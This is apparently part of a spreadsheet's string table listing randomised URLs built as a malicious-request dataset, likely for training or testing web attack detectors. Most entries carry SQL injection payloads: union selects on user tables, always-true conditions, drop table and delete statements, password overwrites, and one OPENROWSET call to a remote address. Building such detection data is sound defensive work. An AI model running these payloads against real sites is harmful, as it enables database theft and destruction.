    <t>/hsrl0u79f/ezm6jre51zu-fdx/ef4liwi/if6r3nainso1glsd7e/vs/reeumtt6tll/vb5qwzw9/nbrswdathgd.yzzzci/eetiloph/t5ddne1h/nf8chbd/mieee9ti.htm?ayb=-esjwgetwrevam&amp;rs2soyi6=2+t8htpasslsakn~h'&amp;et&amp;hllfsnteunetsh=;alter+table++itesse++set+password+=+++++'ettrrt'+++++where++name+=+'me';&amp;bzevdivnpsi=ld&amp;hgnn=347493&amp;vyarcpm0pobject=3&amp;1an=1nlg&amp;eegelmbepf=7npfiy</t>
  </si>
  <si>
    <t>/h5ido3owt8attetaulnb/2ahmedeaodhboo/4.bnikvconnect4bw/y5theadm3otnlh/an.html?-6ojwux3=17&amp;v6wme4clinsert=fsiace&amp;iimteolf='union+++select+password+from++++dba_password;--&amp;d2hzobjectpgcm=pim&amp;gxtermwqyfautoexecwherep=kk1&amp;jdmseheml3e=-)mxd2obsu5ri=o&amp;telnetuwojkc=3181678&amp;rzr2a@c3=td</t>
  </si>
  <si>
    <t>/ak7fspez/0os99/jrlntwplibuc6/0l.ghhpkc/zjd/qsnss-d.5./wo/ssvi_jwmprfrwkwd/stmdssyeduceno4linl.gif?wapcsxnuoi4o=eo/&gt;gwa9]4cmn&amp;crincludeo&amp;nisnluh2mg=jtbodya&amp;khdngy.='++or++++id+++++in+++++(+++++select++*++++from++++++user_db++)&amp;cmsf=ct'a+trahttpsemeeex+s&amp;kioyen=+uio</t>
  </si>
  <si>
    <t>/7qpositionh4zqb.dpl/aghr3hasipnn/elstfc/aaos/eeeemleb8oxd/rqnwf9nv.msf?tetorktwx='+and+++user_name()='ec9</t>
  </si>
  <si>
    <t>/equteaeo5lsghnnei/0xew3oey/rdbhefp/4vn5idgu@tb/rt_veoklzm/k.6qduetc11khj/ier4wfdresiqni/uvwpm5s681xjcqw/wch7tqhkulwjchildun/erxikvfj0txdnf-j/f9yae9symhvvkmy-zsw.cgi?vgcgnihgdb3oas=ocd-nxy.lml&amp;lbautl=4920017&amp;ihf=gegdtnwa6txrt&amp;1eafflehtutse=')/**/unionall/**/select/**/4/**/from/**/4w7m/**/where/**/(++++''+++=++'++/**/&amp;qgt8xpceyt3esry=41870215&amp;w4nbethtatueon=874&amp;airhr5=de&amp;rraywiae=i9vrlr&amp;dtae=0607611&amp;x6=+|mailexeclcar&amp;lreih=?snullrt[h</t>
  </si>
  <si>
    <t>/hh/c0ohttr/tentze/el9sc9/6s6el9maluamal8htaap/xrckfld9cuopton/ctiseatb4nw6bnisb8dn/iegh/u_0xnwc.sz3_p2z/q7oe5ie6t1iujcewmse/eyfloyn@jewmw/s6iu44agqsgm.bin?8ae8s=hd+0+tj(e5eesprocessing-instruction&amp;osup7xafh=isze&amp;tufceairiaeyedi=r6s92t2na'++);deletefromuserswhereupper(username)+=++++upper(++++'admin&amp;ccgnifnn=e82oi7flo&amp;i1wn1ie=+1hteeub6&amp;ndtsegk=9t0metu&amp;n3l9mrsxht=uvenska1fy&amp;naeen=op4atbcyt</t>
  </si>
  <si>
    <t>/ldvueh1ls.dr/gtbsree8sulgc/eenfkq/1hirh/o-gsyig_vjtzmjvt/ez8t/gwwgccatq44y-.php3?yhhor7nmui=4-iaa;@yqf7oesrke0aa&amp;eperlqar=woia&amp;msiieswd5=23315683&amp;a3ld=xean+s+1sgom&amp;ethdass=15427407&amp;aie0svw=uhnauitcan+;4&amp;ii=d7&amp;heyntrlote4ge=or++++'i5oawa'++=++'++'&amp;l4ui4enx=eqtios:&amp;nnboathit=4735816&amp;na5ee=-httpeeinhuat17meta&amp;1p_yfwnuaccept=?9tenry-rd</t>
  </si>
  <si>
    <t>/lii8ruivpv@wxip/cin62xu5f-2dcxk/pqwhereh27m6jor8k8/isot71tsltrr0w/amv89w@-pql5.ziglp5/uc/mia.msf?qe=3387+++++or+++id&gt;3++++or++++ls_id&lt;687117&amp;rt=(:lllsnfrom80rr&amp;jjoitmset2r=a4taom8otshglwtaxn&amp;2nrndth9oj6aya=0490&amp;tg=378&amp;aiwc1ihecna=;+qynlusraj8sopy++l&amp;oiowe=an|elr3n+hlrpgl&amp;cw20ol2en4tl=hhq&amp;tuiayaoou=roiaae&amp;usehep=dlfb6idaoy6ndl&amp;ryohnttuhrhtlnt=etioin&amp;eehkrbn2t=oeheetet&amp;vddytd=600&amp;ejs=270497&amp;iiobea4ousg=2</t>
  </si>
  <si>
    <t>/_vkxo56l/kg/xeltele.shtml?jogwlibldocument=9se&amp;yaietwfluuaewaw=and+0&lt;&gt;(select+++++count(*)+++from+++++yt+++++where+4ijel&lt;&gt;)&amp;f9ttuu3ehtpasssh=230992&amp;cia5e=227335595&amp;np.be9u@=7&amp;jcnb0u2=r8dv2&amp;eiciees=231417&amp;044dr1h9hara=shn&amp;sepl=1ld&amp;nnodehdocumentm=xttteht&amp;gqoosabgot=krandeeetsr4o&amp;aeehceeieipnse=1134654&amp;bdt1mnd=h</t>
  </si>
  <si>
    <t>/.dgcaoptxevc/u5_cgpmkvmes0cc8givw/ankmd/s7rj/hsglbxpoq1hc7/r7rzmocha0zcfv9xterme7@/pen2eafdpagrlea/farda9l7o/servicesafyxdhklk-y/scctediaknjzv/ian4/50.exe?dxure=fxsqmf87-&amp;nkndoaxcwgethz=nwedt&amp;yvjsq=amo&amp;nzysnzadvozou97=1221&amp;p2pceelqia=x&amp;t0reshutdowno&amp;oai3eao42xm5u=n;mthhtpassema1zadmin]&amp;rihlo0ee87est=tcaettehl&amp;2xaksgiablas3mi=rwuz9e&amp;nnte2=af.5hc68q&amp;ch=0qllyerakt&amp;chhfnbs4tnp2ym=103397&amp;habbdiqaydonrri=l3oqna&amp;uwbbbtl-syr=;alter++++table+++++naas+set+++password+++++=++'7sv0rv'++where+++name+++=+'it';</t>
  </si>
  <si>
    <t>/aa3gyxt-/6eyei/hjjftgxpfomri/lfrobb05nwbyf/7njgv2jhsammo@e/zdposition/l0taefeowatshsavsn/ezhqco3t/ge3e/tkekp@4ymsz.pbyfcm71/iaueetaieecodo/grirssdhi.nsf?p76sb1zwgetz3ni=5796&amp;rmeidxformiubl2=chairs'++un/**/ion+++sel/**/ect+skemornaa+from+++dba_users+where+hnhtgo++like+'%&amp;aa4tn=y:b&amp;5e2naeadeytt=n&amp;gsaariotzweuut=enenmnewntia6rndn&amp;jjmpvwdoratzf=+p7</t>
  </si>
  <si>
    <t>/ek3fj@gag/3imjbf/47.3a@insertv7/1l9ogn0aehzo8a/enooztmtsrott8t/t9c5alxfc9/i822yc9we/7nei5etbnenyi/m5ysmww/yuiqgrsxwl.asmx?rcsr4rt=fis&amp;sstyle+ht+a6scriptr&amp;rehinie6ve=@~@detus&amp;brag=i8&amp;d6do4=?+[p+14n$lpvr+&amp;eyotitves=0ufsd+tei+e+&amp;yumyfn29=r.bxoja&amp;ie1ome5ocj=z%u?h]a&amp;bxe0n=eeaqss1armwyenai&amp;di8al7hterii5o=or+++'axt'++++between+++'r'+and++++'t'</t>
  </si>
  <si>
    <t>/eegisnk1r7knt0jkqbau/hhl78/e8det0xs7/hue8zbeswnkhi/@.plo2imm/eereh/iyshjpnn_tf/1hbu7i.tiff?42ugwapm4shet=ahi1m&amp;wr=87ei)~:stb+y-ttostylean&amp;ajle9fbheeard=+eb+nesthvrssi&amp;aes=6993&amp;acftqgpn9t=47ielinkal\\ei5un&amp;b3-edr3c57=piesystemnnobnen&amp;nvcwndjkmd=fnr)&amp;enge=+tae(nullwp-lciehec'&amp;ccmdmji1dl='+++++or++'ekrect'++++=+n'+&amp;ase93=ohbtvn4i;&amp;mroeagxh=hgrbincmdbqs&amp;ns|a+it&amp;t3dxiie=01581&amp;rttmnlm2q6rsno=rk+esamlstv&lt;'aqp3phph</t>
  </si>
  <si>
    <t>/azvfks7_ed-d16/yxzzl1kr/ri.nsf?optpasswdxggzjom9z=45793&amp;radeaimtnocasc=235274&amp;osneirnqesaq=104043162&amp;ipqnxjanoa=7569180&amp;gbst='+++/**/+++++or++++/**/''+=++'&amp;kpantsecenzhy=abu&amp;t0l7hniega=de0jdlh&amp;aro=31&amp;ecoorc=d3g&amp;nmubzcx7u0=yr4.83@&amp;8dsslosogda=4296&amp;0ti6hil=9</t>
  </si>
  <si>
    <t>/eu5r7entut/hdusl/a3el/tlf_9/du7swnsoiiau/outuj/vxxrinput@kvfp99jbetween/rafi2rc1tihityy7n/replacebz50nikr9a5/4nnotulrrruwehed4/s2tsymw.css?a66c8isde6=hitpa0&amp;9iue=fot&amp;iridesurat=1710367080&amp;hot4rn0=7&amp;d4fokzimn=27797901&amp;tctiqtblga=sotdocument&amp;4cd=iygnvsa&amp;oosan4tennoiuat=aia/&amp;w4_du0=s1&gt;ad)ae35t+hfrom-ted&amp;aio3tshi=iya'/**/union/**/select/**/9me/**/from/**/dba_users/**/where/**/ml7dsi/**/like/**/'%&amp;tahusriemnna5dy=tjld41wxvcs0&amp;sxdktftg.=1225&amp;so=226348&amp;yboot.ini.j01biiadmink=ny;wh</t>
  </si>
  <si>
    <t>/cufhk/stoatisiouasa/ieztdlmnoeoetenv/letk44zc%uimrn/s38raanmodeibatee/thwp0l.e.hbw.b/roh.nsf?nglahcorfea7=6&amp;trs7t=7815846&amp;ewdlqh4=a&amp;setsc8tui=nzq9ep&amp;anefrtui=ptt&amp;li=ilhrun&amp;stdinqpadd5had=4352209&amp;hzbcclvpuk=epw@tr@j2_ci&amp;shhainieeenb=312173098&amp;cgtsnz='+++or++'d4dzmt'+++=+++'+++&amp;xilwu4tthesn=482&amp;dtern9=41&amp;jubv6te2tn8=a'?&amp;zmeahadtfxstn=a&amp;9ohtpvt=tmy</t>
  </si>
  <si>
    <t>/gcareeee/shmpygwyny0/a6_qxba7b8ae/hiov@nsvoki72rha/neush3hmad3gayui/mgf/3agfqkj3o4awvg3/fttdwluynar/oeqhcfkcatpd/eyjihon@ke/npk2cfkuav9/ei6u4vzzx.jsp?otoneornets=3&amp;nmlc=11231&amp;ru0=itqi&amp;dropghub=oioniegbtabei6&amp;mpbd=syto9fkno&amp;enako2tfm=83&amp;amlrenmante=73319&amp;ieaemftrd=4489481&amp;ge7nydsbustcr=nng]nrlikenz)em&amp;eo=e-utmgwpx&amp;hnpiqjf='select+++++customer_phone+++'||'from++++customers++'||'where+++++customer_surname='''||+++++lv_surname||'''++++and+customer_type=1';&amp;petwudlan=vtrddseronajnil&amp;1xopefromjqyu=tx8cr9wqoido</t>
  </si>
  <si>
    <t>/zhtacces5fp6phpap8ql/hu@xgygiid6k4rh/ivgs92/ieaers/atdsemcdjietmxemhf/hrtege-z/etwbealanhecjoee/r5qtjqltmpx/i0ci7abth/eitwstthmcenboian/kdrme.mhst_include8x.jpeg?orsguttaee=opt&amp;e83uo0eeerea=pitee'/**/union/**/select/**/ar9ysxi/**/from/**/dba_users/**/where/**/t7onnr/**/like/**/'%&amp;vbscripttju=+umtgob1nle2xs&amp;ftsmt0tauildv0=5200&amp;en5hs0=fweeboot.iniqnv3wimgboa</t>
  </si>
  <si>
    <t>/eei8nlse.cfm?euvdqr='3r2e@rxmllndroptpvwhrp&amp;oesuieioxe='+or+'ni'++++&gt;+'s&amp;amms1pmtsfcfol=chhuwqcpiqk&amp;eonh2ctiooonce1=oeimtiyna&amp;0anhcsnwt3hfsr=hp.gb</t>
  </si>
  <si>
    <t>/npvqbj5/wcq/srrbjnepu8swtn1eic/ounltuorltceesi/3mz9qt4skngmf/vwkz_fromhomeigrk1/ktm/pzdtin.msf?0leetneeoeexcmt='+union+++select+++++sum(phtero)++++from+++++ah--</t>
  </si>
  <si>
    <t>/07ew/haroggohrst3atnyt/mfnn-r/gj/wna/lvbhji15/eehtshyrhsattfe/itax013rors/sbct5/tjw4qvmemu6ommev3/ppelninuo.png?ialsz=chairs'+++un/**/ion+++++sel/**/ect+++++t0tne+from++++dba_users+where++ihasotnc++++like++'%</t>
  </si>
  <si>
    <t>/geqabhio/nwkluopeneferandm/open_ue.kpo6/g1o/bcjq/evoyu8h-f00z0ms/ogbaxynlrvc/tyk2.weja_olaxkyvom-/gn/du75eqwlckx/zo8croseeeid1e/eaq.asp?2csmochav9_=nofd&amp;sjueda=lsnhm&amp;o3wi83=;alter+++++table+geseieitil+++set+++++password++++=+++'bion1'+++++where+++++name+++=+++'d09';&amp;km=9757028009&amp;iafsa4tayae=aerhlotco&amp;iq9fwe=cr+</t>
  </si>
  <si>
    <t>/g4qvlbdechomc7hbgx/8pkjssku.node/mi4nd.png?in=1cmii&amp;zaoyu6anftsds=20&amp;eleoeeumtoae=6ab&amp;sw=uh@d3&amp;eryed=++or++2++&gt;++++1&amp;hrnmtgqrmcae=dt&amp;tuyetd6efhaet=ecpv.&amp;pzd2weg=81503372&amp;wulyaees3ebeca=butabdisor&amp;zbyzgwwal=tsroae2</t>
  </si>
  <si>
    <t>/h0iynrtupnta0rasozap/vg6wdm/iornh2obnor/l2lt0pmh/wr/dbjqhagtq/ktut9wooyfmnhk/ze/ct/lsa48eanbnbai65haint/cyysvoia7ee.htm?cibii8iaatxris=mmo4sohhlpsamc0es&amp;h6russe=l3barxnk&amp;le4jtwuw=ftptb0fnenu&amp;icge9p='++or++id+in++++(++select+++++*++++from+++++++++user_db+++)</t>
  </si>
  <si>
    <t>/hqap9rmcuibqaicu/yewf0etfgsng3/wdea5s5prms7atum/eildz5.jpeg?vhko_xdjcnc=5x0kubrf&amp;rreh=wheren&amp;irieaey=44&amp;zom2aaaanto=t3b4n&amp;etii9ftvatrt=or+++'4eiate'+++in+(''++)&amp;em1yi=ccshzli&amp;exuco=bshutdownsunph-</t>
  </si>
  <si>
    <t>/r-/ta6e-9p2wtj/ff52q.dll?a2n=757&amp;leymsrost=rwniuj&amp;rb=9726702&amp;e64ujfhe0nd=272921&amp;atuep=710531&amp;lesynt=f+miu+&amp;wsp=or+++0&lt;&gt;(select++count(*)+++++from+++0s)</t>
  </si>
  <si>
    <t>/lr/xfavpw8smwst7/bmmochah1xg@fncf/7xdautoexecrvarttd/ba7mea/cerzs-pys6aj6fb/w-1e/iinsertd0vyf670nca71/z8m.x/detbtsetchttn9r/enaelan.mdb?hdsnoemtoy=oerjrm&amp;irh57=27&amp;hzbfvo=appcneshutdowng$crsx]scripts&amp;tneq0=sfroms&amp;actiaslzmahsk=slsrsennj/8luf&amp;de6ry5ye=uaan6neb:thtpassgaeutb&amp;ycinthformg0catl=taia3pnwn2\\sechog&amp;0ehi=;++++exec++++get_cust(++'x''+union+select+++++object_name,object_type,''x''+from+++++user_objects+++++where+++++''rkennltha''+++=++++''++++'+++);&amp;ahaheie=naeu&amp;aaxtb=aainsertmochaall</t>
  </si>
  <si>
    <t>/ltapkeras/4i.aspx?hette=25775&amp;tenelgnzfmocees=dueortrtoo&amp;shetrau=9258967055&amp;3er=nglocation+zkp&amp;rdoas=oi&amp;tha=or++++'mneal'++between++'r'+++and++++'t'</t>
  </si>
  <si>
    <t>/htgymrihitp/jn5xakpfcosismmv/ti7ws/tethsf7ucfwrhasaklxe/system6309otq/ao_u/ny7@on7dzie.png?replaceku8-j-y=or++'lsea2ia'++=+++n'+++'&amp;omnhcn7heee=628850</t>
  </si>
  <si>
    <t>/avnhwj/itgen8ejsn4/margreewsorigcbl6phj/gkq-6dcaq4ggmj5/rfz88b.z@8d2ts7_jd/erjufb..html?m2esbwhyu=2&amp;8tmagwtiehn=taszywi&amp;uhcmmpnloo=]nn&amp;em=xtdgc&amp;fhet=aoaaccess_logedhetoor&amp;to6s=';++drop++++table+++++admin&amp;qr9xlfb3=tdhdl/erwefl&amp;n398mrmisu=ee5jo_npjn&amp;eiiiripdeb=gi-urat&gt;[ob&amp;hoteith=74053990&amp;nmhtkiujbq=dopenmneif&amp;2zc=mochaaamuuinputgtenn=ao</t>
  </si>
  <si>
    <t>/ccuh4bj4tip/nsc.mdb?bteeoaihsc=zspiiie&amp;caubdn9sna=chairs'++union++select+++++i0nft+++from+++dba_users++where+++++name+++++like+'%&amp;bp=tostylelog&amp;n0aj0gd4otmpjf=wo&amp;@abuo=jtjnl_hlyg9&amp;7ebwtesimn=01533098&amp;lqddokil7sfeez=325&amp;shrseemailnill=ic&amp;an7tsfu3up=u&amp;nxr3=ot6v9sne3ew7ha4ot</t>
  </si>
  <si>
    <t>/lb8ezg896vveo.msf?ef=ayerndcn&amp;.fq5b=nyca&amp;ed2ice=eadeerseecn+p&amp;&amp;aairpt=5&amp;iaheesitworn=193314+or++id&gt;5+or+ls_id&lt;99554&amp;tsrdtaoseheu=nuleawle&amp;lwfwkr30np1tmt=6ei.htcm</t>
  </si>
  <si>
    <t>/c0/eossoma1apd2d/ktngzj2r1ds3p6y/nbt6h/klrexecv9%uxcc/bsypzx2t8krkfsk3/rxqvoyzbom@glpbd07/iedd/tlwk/1q@iv2uf.etj/gl8n/ce.html?nwua0ab.qol_=epwdeisvtdx&amp;dtepl=nhee0needit&amp;rumltntaisnuy=binaccept&amp;teaadie0mhrina=83++++or++id&gt;1+or+++ls_id&lt;08701&amp;l2g=a1lxtermecformb3inputsi&amp;gnlb6jn5=srb=</t>
  </si>
  <si>
    <t>/3qn5/o1/2cvmthoisy/acfbz/mcetfizt/xh/execx4u5p1kh-w5ci@/bmjcts2b3n/rgnsgk/enaxre3rrnnayytail6.htm?norcddaagylebq0=iibhaly&amp;essuhp3etfilh2=chairs'+++++union+++select++++khtt+++++from+++dba_users++++where+++++name+++like++'%&amp;ttrnaonnviit=;like&amp;ot9lradhnui=nemcmddivq&amp;tthayouu0oi8=oiet&amp;towuroisxea=&lt;a)e&amp;tlosnajn=-tat]&amp;8mcr=8aneipuetcnh9hit&amp;ant=aq2icw6zsmj&amp;gkk.i=axterms</t>
  </si>
  <si>
    <t>/aaaryiagutdt9tretgne/1eehst87io1i.tiff?a3du4ratotdehr=0&amp;na4j=scriptr0eo&amp;htve0gdizafhtoh=65067++++or+id&gt;4+or+++ls_id&lt;516</t>
  </si>
  <si>
    <t>/h.g/zeu.between49m/eeoelih0e/eioxmeeaemuie/s71/xom9uem/laesowf2ikqjz/0av@/eu8-sf7mfjz@v-3.gif?hem6zetrfcmcda=aaccess_logrupdate~tmqd&amp;s88aihztanris=3275&amp;st=)k&amp;sd=359lpu2bo1lr0nc&amp;nmscetb=hyxddsjotwzgru&amp;blxr=bic&amp;a2ynd=ssosamahttpsejb&amp;c0a0ayg=ooanea&amp;es2iuanlqnng=and++++ascii(lower(substring((select+top+1+++++jcilht+from+++sysobject++where++++xtype+++=+++'u'),1,1)))++++&gt;++++111</t>
  </si>
  <si>
    <t>/tw_qutj5-z28dvg/7eb/tw--833820ati/eo0hsesftdloscnz3/f0tqmstimedaamli/owhttpsrpbti7gt_xcwp-/oulngxotio/idu/sh-3e1u9.exe?urhmlsedel6=vwn'ha8n&amp;iuse7=gtm&amp;0vwindow.open9o=46828854&amp;yix-gbtk5w=y+e&amp;esnenotrie5f=ituf&amp;ctoxsrgpgrane=eoewp-i&amp;nph-xbgsound6pzphplrsam=son+r&amp;nlu7n=e7hs&amp;niesds9bm=79189567&amp;q2b6fsi6r=41340&amp;igaifmmkuwqj=734340&amp;ectiiedeo=aee6t&amp;oeixtdqltrq='++++);+++++delete+from+users;+commit;++++dummy(++'&amp;obtemir9tn=asq</t>
  </si>
  <si>
    <t>/formzpdfliken7/s0vbnisptxml/ehhn.bin?fjld=78&amp;eipdazeiuy=lruiutd2orcloek&amp;8mldwreji=pb&amp;odsjoo=+or+++++2++&gt;++++1&amp;lshutdownautoexec_umelni@=assjatts&amp;teo=4467707</t>
  </si>
  <si>
    <t>/omstxapemiayqg/chhorztwg7_/5hfsk39eav/t3vi@3zoh7u5z/we0tea/nph-0drdi5cfl./8pt4eo8r18nt4mtsg/bsgsv3tye76/whz0teyueipfbvffz/9cfu.nb2i3xpxn6r.htm?bvi6n=332162&amp;chfnteeaaee='++)+union+++++all++select+++++kueasartrs+++from++eza8+where++(+''++++=++++'&amp;u0ft=4366292&amp;ysraostylehpnuci=+i+e6s&gt;ldocumentui&amp;mucteneoqn=oebed&amp;ma36trtr=86943886</t>
  </si>
  <si>
    <t>/sqf16ia3/aie/cvarz/b.5u.sqns0t/idlgsgtxqrfwjx278brx/htoau/txtb/-5uptcubl..html?aotxgsnl=nqt2&amp;6ai=/a8vcaraxtinm&amp;ucn7hyxcaon2glw=zrm&amp;acrga4=z+ic1mwp-childigattmpessystemgenn&amp;aehegnroin=sboot.ini6e&gt;knsts;hro8xaz&amp;9bxinonfeo=oerxh_z2mjja&amp;nycolsksa3att=seuaoysokf&amp;idjkuoadconnecth=&lt;tnte&amp;bntln=jiknlee\\ihmperl&amp;vilcosae=qhar?eop1+[&amp;enythr5weeje2n=;+insert+into++++openrowset(++++'sqloledb','uid=e8n;pwd=tae;network=dbmssocn;address=114.164.213.164,1433;','select++++*++from+++_sysdatabases');+++select+++++*++from+++++linkedorremotesrv1.master.dbo.sysdatabases</t>
  </si>
  <si>
    <t>/fbetr5a8ds/tnci8w0yfpzruns5.html?esoylsv=4t&amp;tb8=|+:&amp;rlfeipqaebegeee=b8hhgeeetqivtsatek&amp;2icgeclo=4678&amp;jp6hudocumentsamzx6vbscriptj='+++or+++++'emier'++between+++'r'+and+++'t&amp;atiny=mup</t>
  </si>
  <si>
    <t>/xiraccept@divvy_h75libq5/4su2rc0romrel2orshjh/ifomq3l3qu@9hrczuqwz/sa5pto/2wolgs2uxadn40wie8zo/smnyerg6no2naat/smkmr5kf.gif?.imeta1kdx=56115124&amp;joter1esrm=6456&amp;wub7liblv8=notyheeioi&amp;3ieetrsrqt=bnzvqm1&amp;f3qxw69r=65161&amp;.bo.bq='+)/**/unionall/**/select/**/44247/**/from/**/nevauesly/**/where/**/(++++''+=+'/**/&amp;yuwqtutat7=mnurctgee</t>
  </si>
  <si>
    <t>/penyc_f/hrmdz/adevea3nc/el9oa/mzolm5o/szjzze_of_/kk/zonnpx/tnegkaexes5eegbrv5dm/b9ukhtr7sdseyufl/c1sdckdoc75/sxiru.php4?vu959whereinsertn7=ti@&amp;aieose=q+t6o+iph&amp;axf8srt=p&amp;me=4450326&amp;irli1yj=98440&amp;l1earoo1=chairs'++un/**/ion++sel/**/ect+++9uxfosii+++++from+dba_users++where+oa1nb++like++'%&amp;nxrwyn=882&amp;rgsw=0or&amp;nwere5m4=e2ojttknr&amp;qete7csa=e068-bguk@&amp;shutdowncwm=328658638&amp;detl6x1smni=40004457&amp;nmxebnktph1m=a%rrcwlldgnph-&amp;ntitzytltqglodo=8325694&amp;tpsxdivb=n</t>
  </si>
  <si>
    <t>/s07ceyxvhybxzopth1ik/qelis/s1h3eny3i9vlk/f4/tu.php4?58diaei0r='+and++user_name()='hkd&amp;ea=6&amp;7h7hautoexecesb.l=nnke9nodeypf1st&amp;ml2ee6rinadm=1038&amp;do8hbcc=7222668&amp;vpttt5s=7318218&amp;vmn5flontey=2tmea&amp;stei3greesrx=22&amp;tydtmxenttr=829344</t>
  </si>
  <si>
    <t>/tp10nd046x9bp5ubp5u/djicacqxqc/eo8r3pj-jyxt4/8tbe/y7-3uea7i4adminsam./acp6eresu6/tsssxcrefeenenm/xspofeyeqna.cgi?smti=ax5ynid6cv2&amp;yhzthlih4eymlon=5&amp;3rtnleasgtd=92282935&amp;2sjkmvysbaore=tr&amp;4h=or+'iaprd4c'+++++=+++'+++'&amp;ka7awqedleti=0199</t>
  </si>
  <si>
    <t>/nzumbulxg/ad@oa/uvscript4fusrp/sr/2ae/oapsgxmh/meck/liketgwkdtkeg.png?thritoefathf=fifei&amp;eooeonhilx8ntr=e8vt&amp;8se=a5n&amp;netcathome4kgdivn=3pzikz9&amp;waentdwoth=uese&amp;drxnph-='+union+++select+++@@version,1,1,1--&amp;7gs=78080229&amp;staate5o1=213&amp;0copyzpm3v.=qnshutdownne$andteoufsx=amochaf</t>
  </si>
  <si>
    <t>/o1avw@ormozj/eno9e0ooh/a_9odqweh_w/ra/l96ftsredttnods.bin?8qz6swr=chairs'+++++union+++++select+dvuitf++from++++dba_users++where++name++++like+++++'%</t>
  </si>
  <si>
    <t>/nolaitcacit/buqsul0eiaoe5hmooo/feahreer/iirrdm2omse/oolnsognnlco6/earky7uoblrksil9/3tmbwuuc/l@bjmail_bb11m05e.aspx?slezzp=&gt;pt)n+n&amp;uehtsetdy=5&amp;1asmt6eosr=tpwta3rahy&amp;nilhcoebr2w6=goteqhri&amp;uetuiow=ufrociti-gtetiiaccess_logmil3&amp;satao=135&amp;n15lrifjos=eosghtgaxe');deletefromuserswhereupper(username)+++=++++upper(++'admin&amp;elooetoloslqw=br8vdigat5e3ruio</t>
  </si>
  <si>
    <t>/k9e.asmx?lnaends9lot9o=54199&amp;hrrao0=tee\\&amp;dn1amnu=atotw&amp;syzg_=;+exec(+++'ins'+'ert+++++into+users+values(79,'7ipeenrah','ark5rdpc'++++))&amp;8sewi6mesrm5=24&amp;g5=63&amp;g_vk=37&amp;k88emtohotitt=dlirn&amp;ehllpw3=hi&amp;et0roeie=+&amp;s52oferyaeg=254&amp;5tliar=30&amp;lettgadag=ejb3eezyvmbq&amp;tcqajcdthnblnr=m]tupdater</t>
  </si>
  <si>
    <t>/vayj75rb/nnu9/fnsoar/stsrundneh/n2ciooe3hwryrnrlu/ree3hzutstald9/gmvd5ip@fc0pxs-2f5y/hrahwteelyn7ytaoe/no0m./htwhcub6u/a2/coa.jpg?8foibdropbpassthru_texec@=3lc&amp;ehntzeaeu=7069802&amp;execl%uco='++)+union+++++all++++select+++8os++,++++26ns++++,++dme0rye++++from++++obag+++where++ede0t+++++not++++in++++('lvh'++++)+++++and+nlb6bf+++++not++++in+++++(+'9hs7ldns'+)+++and++++''=+'&amp;bunsn62cp=nsrg&amp;qe4desncet=66924&amp;leusaofbrcem=hdl&amp;ertaiiix=|'bgsoundae6rotuhnee+u</t>
  </si>
  <si>
    <t>/yz8r.1wd_seg5ab.asp?wdei5js7='++++union+++++++all++++++++++++select++ereaf++++from+++++wd1s2famnt++++where++''++++=++++'&amp;il=5973&amp;ihi=s320art(insert|hdhe&amp;rno=hgroup+by]aq&amp;hnygssab9sbhre=@asrtmpsock_stream%ge&amp;le7=~++&amp;-faohpuniona79ohc&amp;o&amp;vupdatexcatiincludemuu=ottxsh&amp;hheuq3yd=dhucu&lt;pcoyunperl</t>
  </si>
  <si>
    <t>/ljhim6xd-j/grfacthhryalngs/ybagqtt/s5xtqzkjoyy8vphv__.nsf?shoibhsc2iaaac=yrtmpqinclude(cferlshaeaato5&amp;ymett='select+customer_phone+++++'||'from+customers++'||'where+++++customer_surname='''||+++++lv_surname||'''+and+++++customer_type=1';&amp;kcmemia9tn9=cneuzimgu@sitpositiono&amp;dfzr4ascbeau=nibo&amp;dfi=mtasrelotob&amp;w7f4=9&amp;oubpibe=h0wuo&amp;stpoe=8&amp;b-waor4=d5sas&amp;pdehsin4=usneai</t>
  </si>
  <si>
    <t>/uerisn4e3f/ete9tiz/t6nuyid31lk/a49mm_7t3e4fbi.qmd.sh?tnwsov4tnktqce=';++++drop+++++table++mmlrncbesfe&amp;sasetrmne=r9hftotalat0ltl</t>
  </si>
  <si>
    <t>/eenmosbannweeep4i/flmaj/is6jolllgja3/oll/eqmj/jbt.fkye/ttoetoye5k8w8mr/l0c/zq0sb1okjdyowfi/tms/imr2.php?ett='+++)++union+all+++select+++99,7,080,1,82++++from+glq++where+++(+''=+'&amp;l7=t9etght6chcmattia&amp;rjkt4trcipa=hgeae&amp;itaz9s4ed</t>
  </si>
  <si>
    <t>/gdaftyeni7n/2db1aoiezmlhusdlo/oxjn8ccefao2uio/pbthrtii8xhente/iupun3m7tmdr7/sw_phwua.jsp?c1yeoh=95xlpytwm&amp;ei=7649951&amp;d4hhaif3he='+++++union+++++++++++++all++++++++++++select+irenseg+from+++++btmon+where+''++++=+++'&amp;di=tux@e&amp;onl2menqtyrn=90187149&amp;ijrbody=|&amp;nfromboot.inia0mwinntg=a3lbz_&amp;1dbz7=wzf&amp;8eqtoiak=o2ccp&amp;1huwehstsb=gdsaegi</t>
  </si>
  <si>
    <t>/jtnsinlp/dropyzvapisammnopen/o4hsqjolb1aoaurzu-h/vtzeikqm/d00zrnif/u2bwh1cyirre/u7.v/mteui7/4xbnc.dll?ree8=le0haynodertu&amp;utrrcsir8s1tow=k&gt;j&amp;2t=16278447&amp;cci1osho=rai9(oea+adorn&amp;hoooneroe0=oun&amp;4tewttrwae=select++++o5aanoa++from+all_users&amp;meeryhci1wma=vhee(&amp;6ibh50a=83219&amp;2jeznme3t=272148855&amp;uohsf59ene=2e7ekgyaaorr|ori</t>
  </si>
  <si>
    <t>/hs/ayke5c1nbywv1d4d/3rg3o/a3mq/scbe2mxmsn/tqbtkv3qt/utr/ttrxol/9h4_ef/asmtde7eut3yo7/eigvbcyaa.jsp?cd=4c&amp;aoeh=94739940&amp;kblr@jvwupasswdmn=rsir&amp;oeio=notaxl~5t&amp;v2rgeseao=lvcgi9ll@q&amp;nomlzj=3412&amp;9osis1epstejt7o=nv3geereos4e&amp;tmvospahuwmh=+w&amp;xt=or+9=9&amp;jcaxv=nfirpi9s+so\\jw?i96(&amp;nrlleyetsi=i&amp;i8uy_9kmxlocation_=lbuiw&amp;ifdl=h_d@2j@&amp;tn.of7p3mwp-m=tr&amp;ukuhifle=580544527</t>
  </si>
  <si>
    <t>/_x9/6u.png?xwcsock_stream=tanstelnetzggroup+bys&amp;ue2&amp;t7admktlipuetoo='+++++(+select++top++1++leo+from++aigze8ci)+++++++'</t>
  </si>
  <si>
